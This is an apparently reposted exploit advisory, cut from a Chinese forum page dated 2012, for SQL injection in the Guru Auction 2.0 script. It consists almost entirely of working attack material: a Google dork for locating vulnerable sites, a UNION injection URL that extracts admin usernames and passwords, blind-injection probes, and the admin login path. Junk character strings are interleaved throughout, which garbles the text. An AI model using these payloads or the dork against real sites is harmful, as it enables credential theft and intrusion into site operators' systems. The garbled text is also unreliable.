Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
A' O6 {% K% x5 j! D: B* F3 q7 x2 t
作者 : v3n0m3 @& Z3 o" i& M2 |. o6 ]
应用 : Guru Auction 2.0
# |# {9 L$ U* a) \+ x5 X: b7 tPrice : $49
" j/ R( a! u4 h" e0 V" a- sVendor : http://www.guruscript.com// u: a: A# n' N; m* `
Google Dork : inurl:subcat.php?cate_id=
. e! _" V/ T7 h0 f9 ?3 H1 f% C- a3 [ ) E( s/ o& o& n
SQLi p0c:
* J% i0 @! z, f$ R( ?6 `( W~~~~~~~~~~
; v# H) K! {/ S+ P% W) ?$ o: phttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
, I# A! e5 D! c. U/ X7 ^7 j3 r
% f4 B9 }/ d9 S8 d7 \' C- G/ \0 D ; n4 ~6 P" E2 r6 t8 G
盲注 p0c:
' A$ Q6 y! {6 G) {8 Y. ]~~~~~~~~~~
- ~) _0 P2 X- ~* \+ phttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
' d' C# `/ A. uhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false5 e- i! X0 i6 @2 J3 L
5 ^7 Z9 _3 O/ q9 ?) C管理登录入口:
) W$ D/ s! b7 z3 I- \$ e~~~~~~~~~~
9 H! n7 e y7 Q/ a0 I& Chttp://domain.tld/[path]/admin/4 u$ a8 R3 z% U' R& {
|
发表于 2012-12-31 09:24:05
收藏
支持
反对